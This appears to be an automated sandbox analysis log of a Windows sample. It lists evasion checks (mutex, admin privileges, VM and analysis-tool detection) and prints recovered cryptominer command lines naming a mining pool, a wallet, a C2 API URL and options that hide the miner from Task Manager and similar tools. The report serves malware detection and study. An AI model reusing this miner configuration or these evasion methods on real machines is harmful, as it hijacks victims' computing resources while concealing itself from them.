                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Found evasive API chain (may stop execution after checking mutex)
                        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-18700
                        Source: C:\Windows\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-18700
                        Found evasive API chain checking for user administrative privileges
                        Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-18802
                        Query firmware table information (likely to detect VMs)
                        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                        Switches to a custom stack to bypass stack traces
                        Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFDB442E814
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NQKUQDKHXWJ4XSVJXG8ASEJB" --PASS="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="GGBFQXMGKIMT.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID=$PPPI
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=POOL.HASHVAULT.PRO:3333 --USER="46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB" --PASS="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="GGBFQXMGKIMT.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="OMSIHLOYWFALYROB" IPP
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QKUQDKHXWJ4XSVJXG8ASEJB" --PASS="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="GGBFQXMGKIMT.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID=
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:3333--USER=46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB--PASS=--CPU-MAX-THREADS-HINT=90--CINIT-WINRING=GGBFQXMGKIMT.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=90--CINIT-ID=OMSIHLOYWFALYROB_T
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443507945.0000000000748000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475631783.0000000000748000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3391043868.0000000000747000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475456723.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE])5
                        Source: explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEWI
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PR
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LTTS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PR78781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="B"BCS5HDMWNTE9HIKLWK/1IKTVYB36GXG1KIDTXELL6PR/SZMNGQ1L+CXP
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=POOL.HASHVAULT.PRO:3333 --USER="46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB" --PASS="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="GGBFQXMGKIMT.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="OMSIHLOYWFALYROB"
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443507945.0000000000748000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475631783.0000000000748000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3391043868.0000000000747000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475456723.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DCA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,0_2_007DCA00
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5720Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3979Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6773Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2905Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-20396
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sysJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-17618
                        Source: C:\Windows\explorer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_4-17428
                        Source: C:\Users\user\Desktop\file.exeAPI coverage: 7.0 %
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeAPI coverage: 4.4 %
                        Source: C:\Windows\explorer.exe TID: 4996Thread sleep count: 183 > 30Jump to behavior
                        Source: C:\Windows\explorer.exe TID: 4996Thread sleep time: -183000s >= -30000sJump to behavior
                        Source: C:\Windows\explorer.exe TID: 6192Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep count: 5720 > 30Jump to behavior
